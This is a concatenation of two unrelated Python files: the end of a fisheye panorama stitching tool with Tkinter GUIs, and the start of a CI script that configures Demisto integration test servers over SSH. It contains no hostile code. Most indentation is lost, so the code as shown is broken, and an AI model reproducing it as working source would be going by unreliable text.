return Image.fromarray(img_mat)
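    # As assembled above, the cubemap output is a vertical strip: six
    # out_size x out_size faces stacked in the order +Z, -Z, -Y, +Y, -X, +X,
    # giving a final image out_size pixels wide and 6*out_size pixels tall.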
# Get XYZ vectors for an equirectangular render, in raster order.
    # (Each row left to right, with rows concatenated from top to bottom.)
def _get_equirectangular_raster(self, out_size):
# Set image size (2x1 aspect ratio)
rows = out_size
cols = 2*out_size
# Calculate longitude of each column.
theta_x = np.linspace(-pi, pi, cols, endpoint=False, dtype='float32')
cos_x = np.cos(theta_x).reshape(1,cols)
sin_x = np.sin(theta_x).reshape(1,cols)
        # Calculate latitude of each row.
ystep = pi / rows
theta_y = np.linspace(-pi/2 + ystep/2, pi/2 - ystep/2, rows, dtype='float32')
cos_y = np.cos(theta_y).reshape(rows,1)
sin_y = np.sin(theta_y).reshape(rows,1)
# Calculate X, Y, and Z coordinates for each output pixel.
x = cos_y * cos_x
y = sin_y * np.ones((1,cols), dtype='float32')
z = cos_y * sin_x
# Vectorize the coordinates in raster order.
xyz = np.matrix([x.ravel(), y.ravel(), z.ravel()])
return [xyz, rows, cols]
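    # Worked example: calling this method with out_size=512 returns rows=512,
    # cols=1024 and an xyz matrix of shape (3, 512*1024); rendering that
    # raster produces the expected 1024x512 (2:1) equirectangular image.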
# Convert all lens parameters to a state vector. See also: optimize()
def _get_state_vector(self):
nsrc = len(self.sources)
assert nsrc > 0
svec = np.zeros(4*nsrc - 3)
# First lens: Only the FOV is stored.
svec[0] = self.sources[0].lens.fov_deg - 180
# All other lenses: Store FOV and quaternion parameters.
for n in range(1, nsrc):
svec[4*n-3] = self.sources[n].lens.fov_deg - 180
svec[4*n-2] = self.sources[n].lens.center_qq[1]
svec[4*n-1] = self.sources[n].lens.center_qq[2]
svec[4*n-0] = self.sources[n].lens.center_qq[3]
return svec
# Update lens parameters based on state vector. See also: optimize()
def _set_state_vector(self, svec):
# Sanity check on input vector.
nsrc = len(self.sources)
assert len(svec) == (4*nsrc - 3)
# First lens: Only the FOV is changed.
self.sources[0].lens.fov_deg = svec[0] + 180
# All other lenses: Update FOV and quaternion parameters.
for n in range(1, nsrc):
self.sources[n].lens.fov_deg = svec[4*n-3] + 180
self.sources[n].lens.center_qq[1] = svec[4*n-2]
self.sources[n].lens.center_qq[2] = svec[4*n-1]
self.sources[n].lens.center_qq[3] = svec[4*n-0]
# Add pixels from every source to form a complete output image.
# Several blending modes are available. See also: get_render_modes()
def _render(self, xyz, rows, cols, mode):
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
img1d = np.zeros((rows*cols, self.clrs), dtype='float32')
# Determine rendering mode:
if mode == 'overwrite':
# Simplest mode: Draw first, then blindly overwrite second.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d)
elif mode == 'align':
# Alignment mode: Draw each one at 50% intensity.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d, 0.5)
elif mode == 'blend':
# Linear nearest-source blending.
uv_list = []
wt_list = []
wt_total = np.zeros(rows*cols, dtype='float32')
# Calculate per-image and total weight matrices.
for src in self.sources:
uv = src.get_uv(xyz)
wt = src.get_weight(uv)
uv_list.append(uv)
wt_list.append(wt)
wt_total += wt
# Render overall image using calculated weights.
for n in range(len(self.sources)):
wt_norm = wt_list[n] / wt_total
self.sources[n].add_pixels(uv_list[n], img1d, wt_norm)
else:
raise ValueError('Invalid render mode.')
# Convert to fixed-point image matrix and return.
img2d = np.reshape(img1d, (rows, cols, self.clrs))
return np.asarray(img2d, dtype=self.dtype)
# Compute a normalized alignment score, based on size of overlap and
# the pixel-differences in that region. Note: Lower = Better.
def _score(self, svec, xyz, wt_pixel, wt_blank):
# Update lens parameters from state vector.
self._set_state_vector(svec)
# Determine masks for each input image.
uv0 = self.sources[0].get_uv(xyz)
uv1 = self.sources[1].get_uv(xyz)
wt0 = self.sources[0].get_weight(uv0) > 0
wt1 = self.sources[1].get_weight(uv1) > 0
# Count overlapping pixels.
ovr_mask = np.logical_and(wt0, wt1) # Overlapping pixel
pix_count = np.sum(wt0) + np.sum(wt1) # Total drawn pixels
blk_count = np.sum(np.logical_and(~wt0, ~wt1)) # Number of blank pixels
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
pcount = max(xyz.shape)
img1d = np.zeros((pcount, self.clrs), dtype='float32')
# Render the difference image, overlapping region only.
self.sources[0].add_pixels(uv0, img1d, 1.0*ovr_mask)
self.sources[1].add_pixels(uv1, img1d, -1.0*ovr_mask)
# Sum-of-differences.
sum_sqd = np.sum(np.sum(np.sum(np.square(img1d))))
        # Compute overall score. (Note: Lower = Better, since this value is minimized.)
score = sum_sqd + wt_blank * blk_count - wt_pixel * pix_count
# (Debug) Print status information.
if (self.debug):
print str(svec) + ' --> ' + str(score)
return score
# Tkinter GUI window for loading a fisheye image.
class FisheyeAlignmentGUI:
def __init__(self, parent, src_file, lens):
# Set flag once all window objects created.
self.init_done = False
# Final result is the lens object.
self.lens = lens
# Load the input file.
self.img = Image.open(src_file)
# Create frame for this window with two vertical panels...
parent.wm_title('Fisheye Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make sliders for adjusting the lens parameters quaternion.
self.x = self._make_slider(self.controls, 0, 'Center-X (px)',
lens.get_x(), self.img.size[0])
self.y = self._make_slider(self.controls, 1, 'Center-Y (px)',
lens.get_y(), self.img.size[1])
self.r = self._make_slider(self.controls, 2, 'Radius (px)',
lens.radius_px, self.img.size[0])
self.f = self._make_slider(self.controls, 3, 'Field of view (deg)',
lens.fov_deg, 240, res=0.1)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Create the canvas object for the preview image.
self.preview = tk.Canvas(self.preview_frm)
# Finish frame creation.
self.controls.pack(side=tk.LEFT)
self.preview.pack(fill=tk.BOTH, expand=1)
self.preview_frm.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview((800,800))
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Redraw the preview image using latest GUI parameters.
def update_preview(self, psize):
# Safety check: Ignore calls during construction/destruction.
if not self.init_done: return
# Copy latest user settings to the lens object.
self.lens.fov_deg = self.f.get()
self.lens.radius_px = self.r.get()
self.lens.center_px[0] = self.x.get()
self.lens.center_px[1] = self.y.get()
# Re-scale the image to match the canvas size.
# Note: Make a copy first, because thumbnail() operates in-place.
self.img_sc = self.img.copy()
self.img_sc.thumbnail(psize, Image.NEAREST)
self.img_tk = ImageTk.PhotoImage(self.img_sc)
# Re-scale the x/y/r parameters to match the preview scale.
pre_scale = float(psize[0]) / float(self.img.size[0])
x = self.x.get() * pre_scale
y = self.y.get() * pre_scale
r = self.r.get() * pre_scale
# Clear and redraw the canvas.
self.preview.delete('all')
self.preview.create_image(0, 0, anchor=tk.NW, image=self.img_tk)
self.preview.create_oval(x-r, y-r, x+r, y+r,
outline='#C00000', width=3)
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival, maxval, res=0.5):
# Create shared variable and set initial value.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=0, to=maxval, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=0, to=maxval, resolution=res)
label.grid(row=rowidx, column=0)
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Find the largest output size that fits within the given bounds and
# matches the aspect ratio of the original source image.
def _get_aspect_size(self, max_size):
img_ratio = float(self.img.size[1]) / float(self.img.size[0])
return (min(max_size[0], max_size[1] / img_ratio),
min(max_size[1], max_size[0] * img_ratio))
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
        # Determine the render size. (Matches the source image aspect ratio.)
psize = self._get_aspect_size((self.preview_frm.winfo_width(),
self.preview_frm.winfo_height()))
# Render the preview at the given size.
if psize[0] >= 10 and psize[1] >= 10:
self.update_preview(psize)
# Tkinter GUI window for calibrating fisheye alignment.
class PanoramaAlignmentGUI:
def __init__(self, parent, panorama, psize=512):
self.init_done = False
# Store source and preview size
self.panorama = panorama
# Create frame for this window with two vertical panels...
parent.wm_title('Panorama Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make a drop-menu to select the rendering mode.
tk.Label(self.controls, text='Preview mode').grid(row=0, column=0, sticky=tk.W)
self.mode = tk.StringVar()
self.mode.set('align')
self.mode.trace('w', self._update_callback)
mode_list = self.panorama.get_render_modes()
mode_drop = tk.OptionMenu(self.controls, self.mode, *mode_list)
mode_drop.grid(row=0, column=1, columnspan=2, sticky='NESW')
# Determine which axis marks the main 180 degree rotation.
front_qq = panorama.sources[0].lens.center_qq
back_qq = panorama.sources[1].lens.center_qq
diff_qq = mul_qq(front_qq, back_qq)
# Create the axis selection toggle. (Flip on Y or Z)
self.flip_axis = tk.BooleanVar()
self.flip_axis.trace('w', self._update_callback)
if abs(diff_qq[2]) > abs(diff_qq[3]):
self.flip_axis.set(False)
flip_qq = [0,0,1,0]
else:
self.flip_axis.set(True)
flip_qq = [0,0,0,1]
tk.Label(self.controls, text='Flip axis').grid(row=1, column=0, sticky=tk.W)
axis_chk = tk.Checkbutton(self.controls, variable=self.flip_axis)
axis_chk.grid(row=1, column=1, columnspan=2, sticky='NESW')
# Extract the (hopefully small) alignment offset.
flip_conj = conj_qq(mul_qq(flip_qq, front_qq))
align_qq = mul_qq(back_qq, flip_conj)
# Make three sliders for adjusting the relative alignment.
self.slide_rx = self._make_slider(self.controls, 2, 'Rotate X', front_qq[1])
self.slide_ry = self._make_slider(self.controls, 3, 'Rotate Y', front_qq[2])
self.slide_rz = self._make_slider(self.controls, 4, 'Rotate Z', front_qq[3])
self.slide_ax = self._make_slider(self.controls, 5, 'Align X', align_qq[1])
self.slide_ay = self._make_slider(self.controls, 6, 'Align Y', align_qq[2])
self.slide_az = self._make_slider(self.controls, 7, 'Align Z', align_qq[3])
# Finish control-frame creation.
self.controls.pack(side=tk.LEFT)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Add the preview.
self.preview_lbl = tk.Label(self.preview_frm) # Label displays image
self.preview_lbl.pack()
self.preview_frm.pack(fill=tk.BOTH, expand=1)
# Finish frame creation.
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview(psize)
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Update the GUI preview using latest alignment parameters.
def update_preview(self, psize):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the primary axis of rotation.
if self.flip_axis.get():
flip_qq = [0,0,0,1]
else:
flip_qq = [0,0,1,0]
# Calculate the orientation of both lenses.
front_qq = norm_qq(self.slide_rx.get(),
self.slide_ry.get(),
self.slide_rz.get())
align_qq = norm_qq(self.slide_ax.get(),
self.slide_ay.get(),
self.slide_az.get())
back_qq = mul_qq(align_qq, mul_qq(flip_qq, front_qq))
self.panorama.sources[0].lens.center_qq = front_qq
self.panorama.sources[1].lens.center_qq = back_qq
# Render the preview.
# Note: The Tk-Label doesn't maintain a reference to the image object.
# To avoid garbage-collection, keep one in this class.
self.preview_img = ImageTk.PhotoImage(
self.panorama.render_equirectangular(psize, self.mode.get()))
# Assign the new icon.
self.preview_lbl.configure(image=self.preview_img)
# Find the largest output size that fits within the given bounds and
# matches the 2:1 aspect ratio of the equirectangular preview.
def _get_aspect_size(self, max_size):
return (min(max_size[0], max_size[1] / 2),
min(max_size[1], max_size[0] * 2))
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival):
# Set limits and resolution.
lim = 1.0
res = 0.001
# Create shared variable.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=-lim, to=lim, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=-lim, to=lim, resolution=res)
label.grid(row=rowidx, column=0, sticky='W')
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = min(self.preview_frm.winfo_width()/2,
self.preview_frm.winfo_height())
# Render the preview at the given size.
# TODO: Fudge factor of -2 avoids infinite resize loop.
# Is there a better way?
if psize >= 10:
self.update_preview(psize-2)
# Tkinter GUI window for end-to-end alignment and rendering.
class PanoramaGUI:
def __init__(self, parent):
# Store reference object for creating child dialogs.
self.parent = parent
self.win_lens1 = None
self.win_lens2 = None
self.win_align = None
self.work_done = False
self.work_error = None
self.work_status = None
# Create dummy lens configuration.
self.lens1 = FisheyeLens()
self.lens2 = FisheyeLens()
self.lens2.center_qq = [0,0,1,0] # Default flip along Y axis.
# Create frame for this GUI.
parent.wm_title('Panorama Creation Tool')
frame = tk.Frame(parent)
# Make file-selection inputs for the two images.
img_frame = tk.LabelFrame(frame, text='Input Images')
self.img1 = self._make_file_select(img_frame, 0, 'Image #1')
self.img2 = self._make_file_select(img_frame, 1, 'Image #2')
img_frame.pack()
# Make buttons to load, save, and adjust the lens configuration.
lens_frame = tk.LabelFrame(frame, text='Lens Configuration and Alignment')
btn_lens1 = tk.Button(lens_frame, text='Lens 1', command=self._adjust_lens1)
btn_lens2 = tk.Button(lens_frame, text='Lens 2', command=self._adjust_lens2)
btn_align = tk.Button(lens_frame, text='Align', command=self._adjust_align)
btn_auto = tk.Button(lens_frame, text='Auto', command=self._auto_align_start)
btn_load = tk.Button(lens_frame, text='Load', command=self.load_config)
btn_save = tk.Button(lens_frame, text='Save', command=self.save_config)
btn_lens1.grid(row=0, column=0, sticky='NESW')
btn_lens2.grid(row=0, column=1, sticky='NESW')
btn_align.grid(row=0, column=2, sticky='NESW')
btn_auto.grid(row=0, column=3, sticky='NESW')
btn_load.grid(row=1, column=0, columnspan=2, sticky='NESW')
btn_save.grid(row=1, column=2, columnspan=2, sticky='NESW')
lens_frame.pack(fill=tk.BOTH)
# Buttons to render the final output in different modes.
out_frame = tk.LabelFrame(frame, text='Final output rendering')
btn_rect = tk.Button(out_frame, text='Equirectangular',
command=self._render_rect)
btn_cube = tk.Button(out_frame, text='Cubemap',
command=self._render_cube)
btn_rect.pack(fill=tk.BOTH)
btn_cube.pack(fill=tk.BOTH)
out_frame.pack(fill=tk.BOTH)
# Status indicator box.
self.status = tk.Label(frame, relief=tk.SUNKEN,
text='Select input images to begin.')
self.status.pack(fill=tk.BOTH)
# Finish frame creation.
frame.pack()
# Helper function to destroy an object.
def _destroy(self, obj):
if obj is not None:
obj.destroy()
# Popup dialogs for each alignment step.
def _adjust_lens1(self):
self._destroy(self.win_lens1)
try:
self.win_lens1 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens1, self.img1.get(), self.lens1)
except IOError:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Error', 'Unable to read image file #1.')
except:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_lens2(self):
self._destroy(self.win_lens2)
try:
self.win_lens2 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens2, self.img2.get(), self.lens2)
except IOError:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Error', 'Unable to read image file #2.')
except:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_align(self):
self._destroy(self.win_align)
try:
pan = self._create_panorama()
self.win_align = tk.Toplevel(self.parent)
PanoramaAlignmentGUI(self.win_align, pan)
except:
self._destroy(self.win_align)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
# Automatic alignment.
# Use worker thread, because this may take a while.
def _auto_align_start(self):
try:
# Create panorama object from within GUI thread, since it depends
# on Tk variables which are NOT thread-safe.
pan = self._create_panorama()
# Display status message and display hourglass...
self._set_status('Starting auto-alignment...', 'wait')
# Create a new worker thread.
work = Thread(target=self._auto_align_work, args=[pan])
work.start()
# Set a timer to periodically check for completion.
self.parent.after(200, self._auto_align_timer)
except:
tkMessageBox.showerror('Auto-alignment error', traceback.format_exc())
def _auto_align_work(self, pan):
try:
# Repeat alignment at progressively higher resolution.
self._auto_align_step(pan, 16, 128, 'Stage 1/4')
self._auto_align_step(pan, 8, 128, 'Stage 2/4')
self._auto_align_step(pan, 4, 192, 'Stage 3/4')
self._auto_align_step(pan, 2, 256, 'Stage 4/4')
# Signal success!
self.work_status = 'Auto-alignment completed.'
self.work_error = None
self.work_done = True
except:
# Signal error.
self.work_status = 'Auto-alignment failed.'
self.work_error = traceback.format_exc()
self.work_done = True
def _auto_align_step(self, pan, scale, psize, label):
# Update status message.
self.work_status = 'Auto-alignment: ' + str(label)
# Create a panorama object at 1/scale times original resolution.
pan_sc = deepcopy(pan)
pan_sc.downsample(scale)
# Run optimization, rendering each hypothesis at the given resolution.
pan_sc.optimize(psize)
# Update local lens parameters.
# Note: These are not Tk variables, so are safe to change.
self.lens1 = pan_sc.scale_lens(0, scale)
self.lens2 = pan_sc.scale_lens(1, scale)
# Timer callback object checks outputs from worker thread.
# (Tkinter objects are NOT thread safe.)
def _auto_align_timer(self, *args):
# Check thread status.
if self.work_done:
# Update status message, with popup on error.
if self.work_status is not None:
self._set_status(self.work_status)
if self.work_error is not None:
self._set_status('Auto-alignment failed.')
tkMessageBox.showerror('Auto-alignment error', self.work_error)
# Clear the 'done' flag for future runs.
self.work_done = False
else:
# Update status message and keep hourglass.
if self.work_status is not None:
self._set_status(self.work_status, 'wait')
# Reset timer to be called again.
self.parent.after(200, self._auto_align_timer)
# Create panorama object using current settings.
def _create_panorama(self):
img1 = FisheyeImage(self.img1.get(), self.lens1)
img2 = FisheyeImage(self.img2.get(), self.lens2)
return PanoramaImage((img1, img2))
# Load or save lens configuration and alignment.
def load_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.askopenfile()
if file_obj is None: return
else:
file_obj = open(filename, 'r')
try:
load_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config load error', traceback.format_exc())
def save_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.asksaveasfile()
if file_obj is None: return
else:
file_obj = open(filename, 'w')
try:
save_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config save error', traceback.format_exc())
# Render and save output in various modes.
def _render_generic(self, render_type, render_size=1024):
# Popup asks user for output file.
file_obj = tkFileDialog.asksaveasfile(mode='wb')
# Abort if user clicks 'cancel'.
if file_obj is None: return
# Proceed with rendering...
self._set_status('Rendering image: ' + file_obj.name, 'wait')
try:
panorama = self._create_panorama()
render_func = getattr(panorama, render_type)
render_func(render_size).save(file_obj)
self._set_status('Done!')
except:
tkMessageBox.showerror('Render error', traceback.format_exc())
self._set_status('Render failed.')
def _render_rect(self):
self._render_generic('render_equirectangular')
def _render_cube(self):
self._render_generic('render_cubemap')
# Callback to create a file-selection popup.
def _file_select(self, tkstr):
result = tkFileDialog.askopenfile()
if result is not None:
tkstr.set(result.name)
result.close()
# Make a combined label/textbox/slider for a given variable:
def _make_file_select(self, parent, rowidx, label):
# Create string variable.
tkstr = tk.StringVar()
# Create callback event handler.
cmd = lambda: self._file_select(tkstr)
# Create the Label, Entry, and Button objects.
label = tk.Label(parent, text=label)
entry = tk.Entry(parent, textvariable=tkstr)
button = tk.Button(parent, text='...', command=cmd)
label.grid(row=rowidx, column=0, sticky='W')
entry.grid(row=rowidx, column=1)
button.grid(row=rowidx, column=2)
return tkstr
# Set status text, and optionally update cursor.
def _set_status(self, status, cursor='arrow'):
self.parent.config(cursor=cursor)
self.status.configure(text=status)
def launch_tk_gui(flens='', fimg1='', fimg2=''):
# Create TK root object and GUI window.
root = tk.Tk()
gui = PanoramaGUI(root)
# Load parameters if specified.
if flens is not None and len(flens) > 0:
gui.load_config(flens)
if fimg1 is not None and len(fimg1) > 0:
gui.img1.set(fimg1)
if fimg2 is not None and len(fimg2) > 0:
gui.img2.set(fimg2)
# Start main loop.
root.mainloop()
if __name__ == "__main__":
# If we have exactly four arguments, run command-line version.
if len(sys.argv) == 5 and sys.argv[4].startswith('gui'):
# Special case for interactive mode.
launch_tk_gui(sys.argv[1], sys.argv[2], sys.argv[3])
elif len(sys.argv) == 5:
# First argument is the lens alignment file.
lens1 = FisheyeLens()
lens2 = FisheyeLens()
cfg = open(sys.argv[1], 'r')
load_config(cfg, lens1, lens2)
# Second and third arguments are the source files.
img1 = FisheyeImage(sys.argv[2], lens1)
img2 = FisheyeImage(sys.argv[3], lens2)
# Fourth argument is the mode and output filename.
if sys.argv[4].startswith('cube='):
            out = sys.argv[4][5:]  # Output filename follows the 'cube=' prefix
pan = PanoramaImage((img1, img2))
pan.render_cubemap(1024).save(out)
elif sys.argv[4].startswith('rect='):
            out = sys.argv[4][5:]  # Output filename follows the 'rect=' prefix
pan = PanoramaImage((img1, img2))
pan.render_equirectangular(1024).save(out)
else:
print 'Unrecognized render mode (cube=, rect=, gui)'
elif len(sys.argv) > 1:
# If requested, print command-line usage information.
print 'Usage instructions:'
print ' python fisheye.py'
print ' Start interactive alignment GUI.'
print ' python fisheye.py -help'
print ' Print this help message.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg gui'
print ' Launch interactive GUI with specified default options'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png'
print ' Render and save equirectangular panorama using specified'
print ' lens configuration and source images.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png'
print ' Render and save cubemap panorama using specified'
print ' lens configuration and source images.'
else:
# Otherwise, start the interactive GUI with all fields blank.
launch_tk_gui()
|
configure_and_test_integration_instances.py
|
from __future__ import print_function
import argparse
import ast
import json
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Tuple, Union
from urllib.parse import quote_plus
import demisto_client
from demisto_sdk.commands.test_content.constants import SSH_USER
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
from Tests.test_content import extract_filtered_tests, get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
str2bool, format_version, find_type
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.validate.validate_manager import ValidateManager
MARKET_PLACE_MACHINES = ('master',)
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
NO_PROXY = ','.join([
'oproxy.demisto.ninja',
'oproxy-dev.demisto.ninja',
])
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'} # noqa: E501
DOCKER_HARDENING_CONFIGURATION = {
'docker.cpu.limit': '1.0',
'docker.run.internal.asuser': 'true',
'limit.docker.cpu': 'true',
'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
'docker.run.internal.asuser': 'true'
}
MARKET_PLACE_CONFIGURATION = {
'content.pack.verify': 'false',
'marketplace.initial.sync.delay': '0',
'content.pack.ignore.missing.warnings.contentpack': 'true'
}
AVOID_DOCKER_IMAGE_VALIDATION = {
'content.validate.docker.images': 'false'
}
ID_SET_PATH = './artifacts/id_set.json'
class Running(IntEnum):
CI_RUN = 0
WITH_OTHER_SERVER = 1
WITH_LOCAL_SERVER = 2
class Server:
def __init__(self, internal_ip, port, user_name, password):
self.__ssh_client = None
self.__client = None
self.internal_ip = internal_ip
self.ssh_tunnel_port = port
self.user_name = user_name
self.password = password
def __str__(self):
return self.internal_ip
@property
def client(self):
if self.__client is None:
self.__client = self.reconnect_client()
return self.__client
def reconnect_client(self):
self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
verify_ssl=False,
username=self.user_name,
password=self.password)
return self.__client
def add_server_configuration(self, config_dict, error_msg, restart=False):
update_server_configuration(self.client, config_dict, error_msg)
if restart:
self.exec_command('sudo systemctl restart demisto')
def exec_command(self, command):
subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
stderr=subprocess.STDOUT)
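    # Illustrative usage only (the IP, port and credentials below are
    # placeholders): apply the docker hardening keys defined above and restart
    # the server so that the new configuration takes effect.
    #
    #   server = Server('10.0.0.1', 4443, 'admin', 'secret')
    #   server.add_server_configuration(DOCKER_HARDENING_CONFIGURATION,
    #                                   error_msg='Failed to set docker hardening',
    #                                   restart=True)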
def get_id_set(id_set_path) -> Union[dict, None]:
"""
Used to collect the ID set so it can be passed to the Build class on init.
:return: ID set as a dict if it exists.
"""
if os.path.isfile(id_set_path):
return get_json_file(id_set_path)
return None
class Build:
# START CHANGE ON LOCAL RUN #
content_path = f'{os.getenv("HOME")}/project' if os.getenv('CIRCLECI') else os.getenv('CI_PROJECT_DIR')
test_pack_target = f'{os.getenv("HOME")}/project/Tests' if os.getenv('CIRCLECI') else f'{os.getenv("CI_PROJECT_DIR")}/Tests' # noqa
key_file_path = 'Use in case of running with non local server'
run_environment = Running.CI_RUN
env_results_path = f'{os.getenv("ARTIFACTS_FOLDER")}/env_results.json'
DEFAULT_SERVER_VERSION = '99.99.98'
# END CHANGE ON LOCAL RUN #
def __init__(self, options):
self._proxy = None
self.git_sha1 = options.git_sha1
self.branch_name = options.branch
self.ci_build_number = options.build_number
self.is_nightly = options.is_nightly
self.ami_env = options.ami_env
self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
self.secret_conf = get_json_file(options.secret)
self.username = options.user if options.user else self.secret_conf.get('username')
self.password = options.password if options.password else self.secret_conf.get('userPassword')
self.servers = [Server(internal_ip,
port,
self.username,
self.password) for internal_ip, port in self.server_to_port_mapping.items()]
self.is_private = options.is_private
conf = get_json_file(options.conf)
self.tests = conf['tests']
self.skipped_integrations_conf = conf['skipped_integrations']
self.unmockable_integrations = conf['unmockable_integrations']
id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
self.id_set = get_id_set(id_set_path)
self.test_pack_path = options.test_pack_path if options.test_pack_path else None
self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
self.content_root = options.content_root
self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
self.service_account = options.service_account
@property
def proxy(self) -> MITMProxy:
"""
        A property method that creates and returns a single proxy instance to be used throughout the build.
Returns:
The single proxy instance that should be used in this build.
"""
if not self._proxy:
self._proxy = MITMProxy(self.servers[0].internal_ip,
logging_module=logging,
build_number=self.ci_build_number,
branch_name=self.branch_name)
return self._proxy
@staticmethod
def fetch_tests_list(tests_to_run_path: str):
"""
Fetches the test list from the filter.
:param tests_to_run_path: Path to location of test filter.
:return: List of tests if there are any, otherwise empty list.
"""
tests_to_run = []
with open(tests_to_run_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def fetch_pack_ids_to_install(packs_to_install_path: str):
"""
        Fetches the list of pack IDs to install from the given file.
:param packs_to_install_path: Path to location of pack IDs to install file.
:return: List of Pack IDs if there are any, otherwise empty list.
"""
        pack_ids = []
        with open(packs_to_install_path, "r") as packs_file:
            packs_from_file = packs_file.readlines()
            for pack_from_file in packs_from_file:
                pack_id = pack_from_file.rstrip()
                pack_ids.append(pack_id)
        return pack_ids
@staticmethod
def get_servers(ami_env):
env_conf = get_env_conf()
server_to_port_mapping = map_server_to_port(env_conf, ami_env)
if Build.run_environment == Running.CI_RUN:
server_numeric_version = get_server_numeric_version(ami_env)
else:
server_numeric_version = Build.DEFAULT_SERVER_VERSION
return server_to_port_mapping, server_numeric_version
def options_handler():
parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
parser.add_argument('-u', '--user', help='The username for the login', required=True)
parser.add_argument('-p', '--password', help='The password for the login', required=True)
parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
'"Server Master", "Server 6.0". '
'The server url is determined by the AMI environment.')
parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-s', '--secret', help='Path to secret conf file')
